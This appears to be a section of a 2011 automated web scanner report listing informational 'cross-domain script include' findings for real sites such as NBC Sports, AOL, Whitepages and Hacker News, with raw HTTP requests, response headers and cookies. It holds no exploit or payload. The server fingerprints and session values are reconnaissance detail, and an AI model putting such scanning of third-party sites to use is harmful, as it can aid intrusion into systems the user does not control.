<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<div class="parentWrapper">
<script type="text/javascript" language="JavaScript" src="http://www4.tinker.com/standard/wrapper/wrapper.js?id=1470"></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.252. http://msn.foxsports.com/video previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/video

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://cdn.gigya.com/JS/socialize.js?apikey=2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25
http://images.video.msn.com/js/vp.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /video?from=en-us_msnhp HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.253. http://msn.whitepages.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.whitepages.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js
http://edge.quantserve.com/quant.js
http://js.revsci.net/gateway/gw.js?csid=A06546
http://stj.redacted/br/om/js/lt/lt.js

Request

GET / HTTP/1.1
Host: msn.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37 (Unix) mod_perl/1.30
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:50:09 GMT
Connection: close
Set-Cookie: wpn_persistent=max_utype%3Ddefault%26PID%3DTUSnsawQAEcAADI6GyA%26times_seen_invite%3D%26filled_demo_survey%3D%26wp_stage%3Dproduction%26persistent_search_count%3D%26had_successful_search%3D; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.whitepages.com
Set-Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; path=/; domain=.whitepages.com
Content-Length: 34492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=A06546"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://stj.redacted/br/om/js/lt/lt.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://music.aol.com
Path:	/radioguide/bb/$\|http:/money.aol.com/$\|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$\|http:/www.weblogs.com/$\|http:/smallbusiness.aol.com/$\|http:/www.blackvoices.com/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The response dynamically includes the following scripts from other domains:

http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/art/merge?f=/_media/ch_music2/moo-12-all.js&f=/_media/ch_music2/com_aol_music_shared.js&f=/_media/ch_music2/cannae_cross_promo.js&f=/_media/music_en_us_js/jquery-1.3.2.min.js&f=/_media/ch_music2/jquery.noconflict.js&f=/_media/music_en_us_js/jquery.authlinkhandler-min.js&f=/_media/music_en_us_js/jquery.globalsearchbox.js&f=/_media/music_en_us_js/jquery.globalheader.js&expsec=31536000&ver=40
http://siterecruit.comscore.com/sr/aol/broker.js

Request

GET /radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: music.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /radioguide/bb/$%7Chttp:/money.aol.com/$%7Chttp:/www.aim.com/help_faq/starting_out/buddylist.adp/$%7Chttp:/www.weblogs.com/$%7Chttp:/smallbusiness.aol.com/$%7Chttp:/www.blackvoices.com/$%7Chttp:/latino.aol.com/$%7C.ivillage.com.*/1%7Cwww.ivillage.com/(celeb-news%7Centertainment-photos%7Ctv%7Cfor-kids%7Cvideo%7Centertainment%7Cmovies%7Cfood%7Crecipes%7Ctable-talk%7Cfood-for-kids%7Cfood-advice%7Cfood-news%7Cfood-video
Date: Sun, 30 Jan 2011 02:16:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=5, max=55
Connection: Keep-Alive
Content-Length: 22064

<//jsp:useBean id="bbFactory" type="com.aol.entertainment.core.beans.BigBowlModuleBeanFactory" scope="application"/>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http:
...[SNIP]...
</link>
<script type="text/javascript" src="http://o.aolcdn.com/art/merge?f=/_media/ch_music2/moo-12-all.js&f=/_media/ch_music2/com_aol_music_shared.js&f=/_media/ch_music2/cannae_cross_promo.js&f=/_media/music_en_us_js/jquery-1.3.2.min.js&f=/_media/ch_music2/jquery.noconflict.js&f=/_media/music_en_us_js/jquery.authlinkhandler-min.js&f=/_media/music_en_us_js/jquery.globalsearchbox.js&f=/_media/music_en_us_js/jquery.globalheader.js&expsec=31536000&ver=40"></script>

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script src="http://siterecruit.comscore.com/sr/aol/broker.js" language="JavaScript"></script>
...[SNIP]...

23.255. http://music.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://music.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET / HTTP/1.1
Host: music.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 96630
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=d50ddeb179d249659073f8d313a6170a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:50:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
MSN Music:
...[SNIP]...
</SCRIPT>
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.256. http://nbcsports.msnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nbcsports.msnbc.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://www.msnbc.redacted/id/40667309
http://www.msnbc.redacted/id/40667311
http://www.msnbc.redacted/id/40667313
http://www.msnbc.redacted/id/40667314
http://www.msnbc.redacted/id/40667316
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET / HTTP/1.1
Host: nbcsports.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.257. http://nbcsports.msnbc.com/id/41322933/ns/sports-super_bowl_xlv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nbcsports.msnbc.com
Path:	/id/41322933/ns/sports-super_bowl_xlv/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848
http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942
http://platform.twitter.com/widgets.js
http://www.msnbc.redacted/id/40667309
http://www.msnbc.redacted/id/40667311
http://www.msnbc.redacted/id/40667313
http://www.msnbc.redacted/id/40667314
http://www.msnbc.redacted/id/40667316
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /id/41322933/ns/sports-super_bowl_xlv/ HTTP/1.1
Host: nbcsports.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
ETag: "634319175391900000"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Cnection: close
Cache-Control: private, max-age=22
Date: Sun, 30 Jan 2011 02:17:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 99374

<!DOCTYPE html><html lang="en"><head><title>NFL riding remarkable TV ratings into Super Bowl - Super Bowl XLV- NBC Sports</title><link rel="stylesheet" type="text/css" href="/id/38167591" /><script ty
...[SNIP]...
</script><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="NBC Sports ... Top Stories" href="http://rss.nbcsports.msnbc.com/id/3032112/device/rss/rss.xml" /><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667309"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667316"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667311"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667313"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667314"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="pulse">
<script src="http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848" type="text/javascript"></script>
...[SNIP]...
<div class="dpn"><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global.js"></script></div>
<script type="text/javascript" src="http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942"></script>
...[SNIP]...

23.258. http://nbcsports.msnbc.com/id/41323678/ns/sports-tennis/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nbcsports.msnbc.com
Path:	/id/41323678/ns/sports-tennis/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848
http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942
http://platform.twitter.com/widgets.js
http://www.msnbc.redacted/id/40667309
http://www.msnbc.redacted/id/40667311
http://www.msnbc.redacted/id/40667313
http://www.msnbc.redacted/id/40667314
http://www.msnbc.redacted/id/40667316
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /id/41323678/ns/sports-tennis/ HTTP/1.1
Host: nbcsports.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
ETag: "634319267483270000"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: private, max-age=60
Date: Sun, 30 Jan 2011 02:17:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102611

<!DOCTYPE html><html lang="en"><head><title>Clijsters rallies to top Li in Aussie final - Tennis- NBC Sports</title><link rel="stylesheet" type="text/css" href="/id/38167591" /><script type="text/java
...[SNIP]...
</script><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="NBC Sports ... Top Stories" href="http://rss.nbcsports.msnbc.com/id/3032112/device/rss/rss.xml" /><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667309"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667316"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667311"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667313"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667314"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="pulse">
<script src="http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848" type="text/javascript"></script>
...[SNIP]...
<div class="dpn"><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global.js"></script></div>
<script type="text/javascript" src="http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942"></script>
...[SNIP]...

23.259. http://nbcsports.msnbc.com/id/41325676/ns/sports-tennis/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nbcsports.msnbc.com
Path:	/id/41325676/ns/sports-tennis/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848
http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942
http://platform.twitter.com/widgets.js
http://www.msnbc.redacted/id/40667309
http://www.msnbc.redacted/id/40667311
http://www.msnbc.redacted/id/40667313
http://www.msnbc.redacted/id/40667314
http://www.msnbc.redacted/id/40667316
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /id/41325676/ns/sports-tennis/ HTTP/1.1
Host: nbcsports.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
ETag: "634319218344200000"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Cnection: close
Cache-Control: private, max-age=19
Date: Sun, 30 Jan 2011 02:17:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97683

<!DOCTYPE html><html lang="en"><head><title>Li lashes out at Chinese fans during Aussie final - Tennis- NBC Sports</title><link rel="stylesheet" type="text/css" href="/id/38167591" /><script type="tex
...[SNIP]...
</script><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="NBC Sports ... Top Stories" href="http://rss.nbcsports.msnbc.com/id/3032112/device/rss/rss.xml" /><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667309"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667316"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667311"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667313"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667314"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="pulse">
<script src="http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848" type="text/javascript"></script>
...[SNIP]...
<div class="dpn"><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global.js"></script></div>
<script type="text/javascript" src="http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942"></script>
...[SNIP]...

23.260. http://nbcsports.msnbc.com/id/41326839/ns/sports-college_basketball/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nbcsports.msnbc.com
Path:	/id/41326839/ns/sports-college_basketball/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848
http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942
http://platform.twitter.com/widgets.js
http://www.msnbc.redacted/id/40667309
http://www.msnbc.redacted/id/40667311
http://www.msnbc.redacted/id/40667313
http://www.msnbc.redacted/id/40667314
http://www.msnbc.redacted/id/40667316
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /id/41326839/ns/sports-college_basketball/ HTTP/1.1
Host: nbcsports.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
ETag: "634319334793030000"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Cnection: close
Cache-Control: private, max-age=56
Date: Sun, 30 Jan 2011 02:17:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87190

<!DOCTYPE html><html lang="en"><head><title>No. 23 Louisville rallies, tops No. 5 UConn in 2 OT - College basketball- NBC Sports</title><link rel="stylesheet" type="text/css" href="/id/38167591" /><sc
...[SNIP]...
</script><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="NBC Sports ... Top Stories" href="http://rss.nbcsports.msnbc.com/id/3032112/device/rss/rss.xml" /><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667309"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667316"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667311"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667313"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667314"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="pulse">
<script src="http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848" type="text/javascript"></script>
...[SNIP]...
<div class="dpn"><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global.js"></script></div>
<script type="text/javascript" src="http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942"></script>
...[SNIP]...

23.261. http://nbcsports.msnbc.com/id/41328610/ns/sports-college_basketball/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nbcsports.msnbc.com
Path:	/id/41328610/ns/sports-college_basketball/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848
http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942
http://platform.twitter.com/widgets.js
http://www.msnbc.redacted/id/40667309
http://www.msnbc.redacted/id/40667311
http://www.msnbc.redacted/id/40667313
http://www.msnbc.redacted/id/40667314
http://www.msnbc.redacted/id/40667316
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /id/41328610/ns/sports-college_basketball/ HTTP/1.1
Host: nbcsports.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
ETag: "634319386759430000"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Cnection: close
Cache-Control: private, max-age=21
Date: Sun, 30 Jan 2011 02:17:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85641

<!DOCTYPE html><html lang="en"><head><title>Orange woes continue with loss at Marquette - College basketball- NBC Sports</title><link rel="stylesheet" type="text/css" href="/id/38167591" /><script typ
...[SNIP]...
</script><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="NBC Sports ... Top Stories" href="http://rss.nbcsports.msnbc.com/id/3032112/device/rss/rss.xml" /><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667309"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667316"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667311"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667313"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667314"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="pulse">
<script src="http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848" type="text/javascript"></script>
...[SNIP]...
<div class="dpn"><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global.js"></script></div>
<script type="text/javascript" src="http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netscape.aol.com
Path:	/$\|http:/music.aol.com/radioguide/bb/$\|http:/money.aol.com/$\|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$\|http:/www.weblogs.com/$\|http:/smallbusiness.aol.com/$\|http:/www.blackvoices.com/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The response dynamically includes the following scripts from other domains:

http://o.aolcdn.com/omniunih.js
http://portal.aolcdn.com/p/v32/63-main.js

Request

GET /$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: netscape.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:17:13 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmb05.websys.aol.com
x-ua-compatible: IE=EmulateIE7
Content-Type: text/html;;charset=utf-8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 15160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="IE7"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://portal.aolcdn.com/skn/classic_v1/4-err.css" />
<script type="text/javascript" src="http://portal.aolcdn.com/p/v32/63-main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

23.263. http://news.discovery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.discovery.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.dl-rms.com/rms/mother/20824/nodetag.js
http://js.revsci.net/gateway/gw.js?csid=J08778
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: news.discovery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix)
Content-Length: 62539
Content-Type: text/html; charset=UTF-8
X-ServerId: 192.168.32.151
Content-Language: en-US
Cache-Control: max-age=292
Date: Sun, 30 Jan 2011 02:17:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html
xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en"
>

<head>
<meta http-equiv
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08778"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/20824/nodetag.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

23.264. http://news.sciencemag.org/scienceinsider/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.sciencemag.org
Path:	/scienceinsider/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://js-kit.com/comments-count.js
http://s7.addthis.com/js/250/addthis_widget.js?pub=sciencehabit

Request

GET /scienceinsider/ HTTP/1.1
Host: news.sciencemag.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:16:19 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.11 DAV/2
X-Powered-By: PHP/5.2.11
Connection: close
Content-Type: text/html
Content-Length: 107268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">

<head
...[SNIP]...
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://news.sciencemag.org/scienceinsider/rsd.xml" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=sciencehabit"></script>
...[SNIP]...

<script src="http://js-kit.com/comments-count.js"></script>
...[SNIP]...

23.265. http://news.ycombinator.com/newest previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.ycombinator.com
Path:	/newest

Issue detail

The response dynamically includes the following script from another domain:

http://www.co2stats.com/propres.php?s=1138

Request

GET /newest HTTP/1.1
Host: news.ycombinator.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
